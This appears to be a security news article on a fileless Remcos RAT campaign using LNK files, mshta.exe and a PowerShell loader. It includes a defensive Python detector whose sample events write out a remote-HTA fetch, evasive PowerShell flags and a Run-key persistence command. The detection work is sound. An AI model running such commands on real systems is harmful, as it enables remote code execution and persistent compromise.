Fileless Remcos RAT Deployment via LNK Files and MSHTA in PowerShell-Driven Cyber Attacks


Cybersecurity researchers have uncovered a new malware campaign utilizing a PowerShell-based shellcode loader for the deployment of a remote access trojan known as Remcos RAT.

According to a technical report by a leading security firm, threat actors have been distributing malicious LNK files contained within ZIP archives, often masquerading as Office documents. The attack chain exploits mshta.exe, a legitimate Microsoft utility, to facilitate proxy execution in the initial phase of the attack.

Recent attacks primarily employ tax-themed lures to coax users into opening a malicious ZIP archive. This archive contains a Windows shortcut (LNK) file that activates mshta.exe, which executes an obfuscated HTA file named “xlab22.hta” from a remote server. This HTA file incorporates Visual Basic Script code designed to download a PowerShell script, a decoy PDF, and a second HTA file similar to “xlab22.hta,” titled “311.hta.” Notably, “311.hta” is structured to modify the Windows Registry to ensure it is automatically launched at system startup.

Upon execution, the PowerShell script decrypts and reconstructs a shellcode loader that subsequently initializes the Remcos RAT payload entirely within memory.

Remcos RAT is a sophisticated malware solution that grants threat actors comprehensive control over compromised systems. Its modular architecture allows it to gather extensive system information, log keystrokes, capture screenshots, monitor clipboard activity, and list all installed programs and active processes.

Additionally, the malware establishes a TLS connection to a command-and-control (C2) server, thereby maintaining a persistent channel for data exfiltration and control.

Fileless variants of Remcos RAT have been previously identified. In late 2024, another security firm reported on a phishing campaign that utilized fileless techniques for deploying the malware via order-themed lures.

The attractiveness of this attack vector to cybercriminals lies in its ability to evade detection by many traditional security solutions, as the malicious code operates directly in the computer’s memory, leaving minimal traces on disk.

Experts in the field emphasize the implications of these developments, noting that PowerShell-based attacks signify an evolution in tactics used by threat actors to circumvent conventional security measures. Fileless malware of this kind runs directly in memory, using LNK files and mshta.exe to launch obfuscated PowerShell scripts capable of bypassing standard defenses.

To confront these evolving threats, advanced email security measures capable of detecting and blocking malicious LNK attachments before they reach users are critical. Furthermore, real-time monitoring of PowerShell commands for anomalies is essential to counteract the threat posed by this type of malware.
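As an added illustration of the PowerShell monitoring recommended above (example code written for this article, not from the report it summarizes), the following script runs simple detection rules over constructed process-creation events that mirror the described chain: mshta.exe fetching a remote .hta, a PowerShell loader spawned by mshta.exe with evasion flags, and a Run-key write pointing at the second HTA. The detection names, the sample command lines, the IP address and the file paths are assumptions chosen for the example.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    """One process-creation record (Sysmon Event ID 1 / Windows 4688 style)."""
    parent: str   # parent image name, e.g. explorer.exe
    image: str    # child image name, e.g. mshta.exe
    cmdline: str  # full command line of the child

# Patterns tied to the stages of the chain: remote .hta pulled by mshta.exe,
# PowerShell started with evasion switches, and a Run/RunOnce persistence write.
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.I)
PS_EVASION = re.compile(
    r"-(?:enc(?:odedcommand)?|nop(?:rofile)?|w(?:indowstyle)?\s+hidden|e(?:xecutionpolicy|p)\s+bypass)\b",
    re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\b", re.I)
SHELLS = {"powershell.exe", "pwsh.exe"}

def classify(ev: ProcessEvent) -> list[str]:
    """Return the names of the detection rules that fire for one event."""
    image, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline
    hits = []
    if image == "mshta.exe" and REMOTE_HTA.search(cmd):
        hits.append("mshta_remote_hta")           # stage 1: LNK -> mshta.exe -> http://.../xlab22.hta
    if image in SHELLS and parent == "mshta.exe":
        hits.append("powershell_child_of_mshta")  # stage 2: HTA downloads and runs the PowerShell loader
    if image in SHELLS and PS_EVASION.search(cmd):
        hits.append("powershell_evasion_flags")   # hidden window / encoded command / policy bypass
    if RUN_KEY.search(cmd) and re.search(r"mshta|\.hta\b", cmd, re.I):
        hits.append("hta_run_key_persistence")    # stage 3: 311.hta registered to start with Windows
    return hits

def triage(events: list[ProcessEvent]) -> dict[str, list[str]]:
    """Map each command line to its findings; events with no findings are dropped."""
    return {ev.cmdline: h for ev in events if (h := classify(ev))}

# Constructed sample telemetry (not real logs); the IP, paths and value name are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "mshta.exe", "mshta.exe http://198.51.100.7/xlab22.hta"),
    ProcessEvent("mshta.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -ep bypass -enc <base64-placeholder>"),
    ProcessEvent("mshta.exe", "reg.exe",
                 r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /d "mshta C:\Users\Public\311.hta"'),
    ProcessEvent("explorer.exe", "powershell.exe", r"powershell.exe -File C:\Scripts\backup.ps1"),  # benign
    ProcessEvent("explorer.exe", "winword.exe", r"winword.exe C:\Users\Public\invoice.docx"),        # benign
]

if __name__ == "__main__":
    for cmd, findings in triage(SAMPLE_EVENTS).items():
        print(f"{', '.join(findings):45s} <- {cmd}")
```

Correlating these rules on parent/child lineage (mshta.exe as the parent of PowerShell) rather than on any single command line keeps the benign scheduled script in the sample from alerting.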

Recent disclosures align with findings from cybersecurity organizations regarding new threats, including a .NET loader used to deploy various malware, such as information stealers and RATs, including Agent Tesla and NovaStealer. This loader operates in three stages, deploying the main malware effectively and utilizing sophisticated techniques to evade detection.

The emergence of multiple phishing and social engineering campaigns designed for credential theft and malware distribution further complicates the threat landscape. Tactics employed include:

– Distributing trojanized versions of trusted software, such as KeePass, via typosquatted domains to deliver malicious payloads.
– Implementing phishing tactics involving ClickFix lures and embedded URLs in PDF documents to deploy additional malware.
– Using trojanized Microsoft Office documents to deliver various information stealers through malware distribution services.
– Exploiting blob URIs to redirect victims to phishing pages through legitimate-looking domains.

The rise of artificial intelligence (AI) in orchestrating sophisticated attacks has also drawn attention, with threat actors utilizing polymorphic techniques to evade detection by altering key elements of phishing campaigns in real-time.

As these threats continue to evolve and grow in complexity, it is imperative for cybersecurity frameworks to adapt beyond perimeter defenses, employing advanced detection capabilities that extend beyond initial email filtering.